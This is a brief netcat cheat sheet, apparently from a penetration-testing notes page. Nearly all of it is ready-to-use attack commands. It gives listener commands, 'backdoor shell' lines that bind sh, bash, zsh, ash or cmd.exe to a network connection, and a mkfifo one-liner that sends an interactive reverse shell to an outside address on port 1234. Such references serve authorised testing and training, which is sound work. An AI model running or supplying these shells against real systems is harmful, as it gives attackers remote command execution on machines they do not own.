Netcat Tips
Fundamentals
rlwrap nc [IP Address] [port]rlwrap nc -lvp [Localport]Backdoor Shells
Linux
rlwrap nc [Your IP Address] -e /bin/sh
rlwrap nc [Your IP Address] -e /bin/bash
rlwrap nc [Your IP Address] -e /bin/zsh
rlwrap nc [Your IP Address] -e /bin/ashWindows
rlwrap nc -lv [localport] -e cmd.exeLinux netcat reverse shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.21.0.0 1234 >/tmp/fLast updated